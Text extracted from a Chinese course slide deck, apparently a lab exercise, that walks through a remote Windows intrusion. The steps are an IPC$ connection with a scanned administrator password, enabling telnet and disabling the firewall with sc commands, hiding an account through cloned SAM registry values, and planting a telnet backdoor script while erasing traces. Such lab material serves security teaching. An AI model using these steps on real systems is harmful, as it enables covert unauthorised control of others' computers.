实训1-3：利用IPC漏洞进行远程攻击.ppt

1、单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,2012,年,6,月,3,日,*,单击此处编辑母版标题样式,第,1,章,网络安全概述,实训,1-3,：利用,IPC,漏洞进行远程攻击（学时）,本次课要点,学习目标,重点,难点,实训目的,掌握常用扫描软件的使用。,熟悉黑客攻击原理。,掌握,IPC,漏洞的攻击方式。,熟悉常用网络命令的用法。,实训背景,某黑客小黑从网上下载了一个扫描工具,NTScan,，通过扫描得到了小李计算机的管理员帐号和密码，接着通过命令与小李建立,IPC,连接，然后在小李计算机上开启,telnet,服务，上传和运行程序，进行远程注册表配置，建立一个隐藏的管理员用户，实

2、现对小李计算机的完全控制。,实训拓扑,实训设备,设备,数量,计算机（安装,windows,操作系统）,2,台,扫描软件,NTScan,1,个,攻击软件,sc.exe,1,个,实训步骤,1.,配置计算机和服务器的,IP,地址，保证网络通畅。,2.,小黑在计算机上安装,NTScan,扫描软件。,3.,扫描目标计算机。,小黑打开扫描软件,NTScan,，输入计算机的,IP,地址，单击 按钮，开始扫描目标计算机。扫描完成后，便得到了计算机开放的端口、操作系统类型和管理员的密码，如所示。,4.,入侵目标计算机。,5.,添加隐藏用户。,6.,保留管理后门，隐藏攻击痕迹。,1.,配置计算机和服务器的,IP,

3、地址，保证网络通畅,2.,小黑在计算机上安装,NTScan,扫描软件,3.,扫描目标计算机,3.,扫描目标计算机,小黑打开扫描软件,NTScan,，输入计算机的,IP,地址，单击 按钮，开始扫描目标计算机。扫描完成后，便得到了计算机开放的端口、操作系统类型和管理员的密码，如所示。,4.,入侵目标计算机,4.,入侵目标计算机,（,1,）小黑在命令窗口输入命令“,net use 192.168.1.254 123456/user:administrator”,，建立,IPC,连接，如所示。,4.,入侵目标计算机,（,2,）输入,sc,命令扫描目标计算机的所有服务列表，并保存到“,c:search.

4、txt”,文件中，如所示。,4.,入侵目标计算机,（,3,）打开文件“,c:search.txt”,，找到,telnet,，确认,telnet,的服务状态（默认为禁用状态），如所示。,4.,入侵目标计算机,（,4,）如果知道,telnet,的服务名称，可以直接使用命令“,sc IP qc tlntsvr”,查看，如所示。,4.,入侵目标计算机,（,5,）输入命令“,sc IP config tlntsvr start=auto”,，将,telnet,服务的禁用状态设置为自动运行，如所示。,4.,入侵目标计算机,（,6,）输入命令“,sc IP start tlntsvr”,，开启,telnet

5、服务，如所示。,4.,入侵目标计算机,（,7,）输入命令“,sc IP stop sharedaccess”,，停用目标计算机的,windows,防火墙，如所示。,注意：如果配置了路由和远程访问，要先禁用掉。,4.,入侵目标计算机,（,8,）输入命令“,sc IP qc romoteregistry”,查询目标计算机启用了远程注册表服务，如果该服务为停用状态，则启用。,5.,添加隐藏用户,5.,添加隐藏用户,（,1,）输入命令“,telnet IP”,建立,telnet,连接，管理目标计算机，如所示。,5.,添加隐藏用户,（,2,）接着会提示发送信息可能不安全，这里输入“,y”,，表示要继续

6、进行操作，如所示。,5.,添加隐藏用户,（,3,）输入管理员的账户和密码，如所示。,5.,添加隐藏用户,（,4,）输入命令“,net user,名字 密码,/add”,，可以在目标计算机上建立账户，如所示。,5.,添加隐藏用户,（,5,）在运行窗口中输入“,RegEdit”,命令打开“注册表编辑器”窗口，如所示。,5.,添加隐藏用户,（,6,）选择,【,文件,】【-,连接网络注册表,】,菜单，在“选择计算机”窗口中输入目标计算机的地址，如所示,5.,添加隐藏用户,（,7,）单击按钮，在弹出的对话框中输入计算机的用户名和密码，如所示，便可打开远程计算机的注册表。,5.,添加隐藏用户,（,8,）打

7、开目标计算机的注册表，右击“,HKEY_LOCAL_MACHINE”,项下的“,SAM”,项下的“,SAM”,选择“权限”,5.,添加隐藏用户,（,9,）在,SAM,权限窗口中，赋予管理员完全控制权限，如所示，断开与目标计算机的连接，然后重新建立连接。,5.,添加隐藏用户,（,10,）展开目标计算机的“,HKEY_LOCAL_MACHINESAMSAMDomainsUserName”,项，找到“,administrator”,和新建的用户“,hack”,，记录它们的类型，如所示。,5.,添加隐藏用户,（,11,）展开目标计算机“,HKEY_LOCAL_MACHINESAMSAMDomainsA

8、ccountUsers”,项下后三位,1F4,的子项，该项和,administrator,相对应，如所示。,5.,添加隐藏用户,（,12,）双击右侧窗口中的,F,键值，在打开的窗口中复制全部数据，如所示。,5.,添加隐藏用户,（,13,）展开目标计算机“,HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers”,项下后三位,3FA,的子项，使用从,1F4,项复制的数据覆盖,3FA,项,F,键值的数据，如所示。,5.,添加隐藏用户,（,14,）导出目标计算机注册表的,hack,项和,000003FA,项，保存为文件“,c:hack1.reg”,和“,c:hack2

9、reg”,，如所示。,5.,添加隐藏用户,5.,添加隐藏用户,（,15,）返回到,telnet,命令行，输入命令“,net user hack/delete”,，删除目标计算机的账户“,hack”,，如所示。,5.,添加隐藏用户,（,16,）将文件“,hack1.reg”,和“,hack2.reg”,复制到目标计算机，如所示。,5.,添加隐藏用户,（,17,）在目标计算机上输入命令“,reg import hack1.reg,和,reg import hack2.reg”,，导入注册表“,hack1.reg”,和“,hack2.reg”,，如所示。,5.,添加隐藏用户,（,18,）完成本步后

10、将真正的在目标计算机上建立一个隐藏用户。,（,19,）在小李计算机上打开“计算机管理”窗口，不能看见用户“,hack”,，如所示。,5.,添加隐藏用户,（,20,）打开目标计算机的注册表，右击“,HKEY_LOCAL_MACHINESAMSAM”,选择“权限”取消管理员的读取和完全控制权限，恢复到默认状态。,（,21,）输入命令“,net user,对方,IP delete”,，删除目前和目标计算机的,IPC,连接，如所示。,6.,保留管理后门，隐藏攻击痕迹,6.,保留管理后门，隐藏攻击痕迹,（,1,）在本地建立一个脚本文件“,open23.bat”,，内容如所示。,6.,保留管理后门，隐藏攻

11、击痕迹,（,2,）使用刚才建立的用户“,hack”,重新连接到远程计算机，如所示。,6.,保留管理后门，隐藏攻击痕迹,（,3,）输入命令，将脚本文件复制到目标计算机的,C,盘下，如所示。,6.,保留管理后门，隐藏攻击痕迹,（,4,）通过,telnet,连接到远程计算机，进入目标计算机的,C,盘运行,open23.bat,脚本。,6.,保留管理后门，隐藏攻击痕迹,（,5,）运行成功后重新启动,windows,防火墙，并且开启,TCP,和,UDP,的,23,端口以允许,telnet,连接通过防火墙。,6.,保留管理后门，隐藏攻击痕迹,（,6,）最后，删除目标计算机上的遗留文件,open23.bat,。,（,7,）从此以后，黑客可以在目标计算机上来去自如。,Thank You!,